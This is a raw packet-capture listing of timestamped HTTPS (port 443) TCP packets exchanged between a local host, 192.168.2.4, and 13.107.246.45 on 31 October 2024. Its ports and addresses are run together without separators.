                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.746331930 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.747510910 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.748121023 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.749758005 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.749789953 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.750258923 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.750267982 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.750463963 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.750493050 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.750798941 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.750804901 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.751399040 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.751411915 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.751754999 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.751759052 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.760214090 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.762600899 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.762629032 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.762988091 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.762994051 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.769133091 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.770592928 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.770605087 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.770994902 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.770998955 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.875543118 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.875736952 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.875859022 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.877682924 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.877741098 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.877790928 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.881223917 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.881275892 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.881323099 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.901211023 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.902976036 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.903064013 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.906150103 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.906183004 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.906197071 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.906204939 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.918785095 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.919092894 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.919187069 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.946948051 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.946964025 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.946975946 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.946980953 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.948141098 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.948158026 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.948173046 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.948179960 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949052095 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949058056 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949069977 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949074030 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949913979 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949919939 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949950933 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.949955940 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.109738111 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.109787941 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.109850883 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.131992102 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.132009029 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.142946005 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.143019915 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.143096924 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.146831989 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.146862030 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.153939962 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.153961897 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.154040098 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.156274080 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.156286955 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157432079 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157464981 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157475948 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157497883 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157535076 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157571077 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157682896 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157696009 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157784939 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.157795906 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.869415045 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.870349884 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.870384932 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.870873928 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.870878935 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.878036976 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.878392935 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.878429890 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.878752947 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.878761053 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.889486074 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.889908075 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.889918089 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.890242100 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.890247107 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.892977953 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893040895 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893238068 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893261909 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893421888 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893456936 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893594027 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893599033 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893909931 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:06.893917084 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.002171993 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.002876997 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.002952099 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.002980947 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.002998114 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.003011942 CET51281443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.003017902 CET4435128113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.005839109 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.005872011 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.005934000 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.006277084 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.006289959 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.008424997 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.008958101 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.009012938 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.009076118 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.009099007 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.009111881 CET51282443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.009116888 CET4435128213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.011183023 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.011207104 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.011297941 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.011411905 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.011425972 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.024923086 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.024976969 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025033951 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025118113 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025204897 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025228977 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025240898 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025247097 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025254965 CET51285443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025259972 CET4435128513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025346041 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025360107 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025369883 CET51284443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.025374889 CET4435128413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.027267933 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.027604103 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.027661085 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028038979 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028044939 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028069019 CET51283443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028072119 CET4435128313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028284073 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028338909 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028413057 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028419018 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028443098 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028491974 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028556108 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028574944 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028620005 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.028634071 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.030422926 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.030436993 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.030555964 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.030647039 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.030661106 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.737075090 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.737696886 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.737709045 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.738218069 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.738223076 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.741688013 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.742204905 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.742230892 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.742598057 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.742604017 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.763468981 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.763835907 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.763984919 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.763997078 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.764419079 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.764425039 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.764689922 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.764720917 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.765099049 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.765105009 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.769522905 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.769867897 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.769876003 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.770241976 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:07.770247936 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592012882 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592084885 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592144966 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592160940 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592209101 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592677116 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592735052 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592756987 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592776060 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592782021 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.592858076 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.593672037 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.593713999 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.593722105 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.593749046 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.601457119 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.601475000 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.601505041 CET51286443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.601511002 CET4435128613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.605003119 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.605017900 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.605057955 CET51287443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.605068922 CET4435128713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.678042889 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.678067923 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.678082943 CET51289443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.678097010 CET4435128913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679285049 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679317951 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679337025 CET51290443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679342985 CET4435129013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679970026 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679975986 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679986954 CET51288443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.679991007 CET4435128813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.736381054 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.736419916 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.736499071 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.738229036 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.738280058 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.738363028 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.738585949 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.738646984 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.739479065 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.739484072 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.739509106 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.740436077 CET51291443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.740452051 CET4435129113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.740489006 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.740611076 CET51294443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.740629911 CET4435129413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.742686987 CET51292443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.742717981 CET4435129213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.742734909 CET51293443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.742762089 CET4435129313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:08.743855953 CET51295443192.168.2.413.107.246.45
